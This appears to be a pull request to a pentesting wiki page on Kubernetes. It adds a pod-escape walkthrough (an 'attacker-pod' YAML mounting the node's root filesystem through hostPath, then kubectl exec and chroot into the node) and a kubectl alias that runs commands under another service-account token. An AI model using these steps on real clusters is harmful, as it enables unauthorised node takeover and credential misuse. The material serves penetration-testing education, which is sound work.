### PR TITLE
Kubernetes: escaping a pod/addition to kubectl

### DIFF
--- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
+++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
@@ -294,7 +294,7 @@ spec:
   restartPolicy: Never
 
 ```
-[Original source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
+[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
 
 After that you create the pod
 
@@ -317,8 +317,8 @@ chroot /root /bin/bash
 
 ```
 
-Information obtained from:
-[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
+Information obtained from:\
+[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)\
 [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
 
 

--- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
+++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
@@ -259,6 +259,69 @@ https://<Kubernetes_API_IP>:<port>/apis/extensions/v1beta1/namespaces/default/da
 
 {% page-ref page="../../linux-unix/privilege-escalation/docker-breakout.md" %}
 
+### Escaping from the pod
+
+If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes.
+
+```bash
+kubectl get pod <name> [-n <namespace>] -o yaml
+
+```
+
+Then you create your attack.yaml file
+
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  labels:
+    run: attacker-pod
+  name: attacker-pod
+  namespace: default
+spec:
+  volumes:
+  - name: host-fs
+    hostPath:
+      path: /
+  containers:
+  - image: ubuntu
+    imagePullPolicy: Always
+    name: attacker-pod
+    volumeMounts:
+      - name: host-fs
+        mountPath: /root
+  restartPolicy: Never
+
+```
+[Original source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba)
+
+After that you create the pod
+
+```bash
+kubectl apply -f attacker.yaml [-n <namespace>]
+
+```
+
+Now you can switch to the created pod as follows
+
+```bash
+kubectl exec -it attacker-pod [-n <namespace>] -- bash # attacker-pod is the name defined in the yaml file
+
+```
+
+And finally you chroot into the node's system
+
+```bash
+chroot /root /bin/bash
+
+```
+
+Information obtained from:
+[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216)
+[Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
+
+
 ## Sniffing
 
 By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.

--- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
+++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
@@ -75,6 +75,14 @@ They open a streaming connection that returns you the full manifest of a Deploym
 The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
 {% endhint %}
 
+### Using kubectl
+when using kubectl it might come in handy to define a temporary alias, if the token used is different to the one defined in `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount`.
+```bash
+alias kubectl='kubectl --token=<jwt_token>'
+
+```
+[kubectl cheatsheet](https://kubernetes.io/docs/reference/kubectl/cheatsheet/)
+
 ### Get namespaces
 
 {% tabs %}


### PR DESCRIPTION
Hey Carlos,

I added more info about how to escape from a pod after the enumeration steps and also added an alias for kubectl to define another jwt_token. References are also attached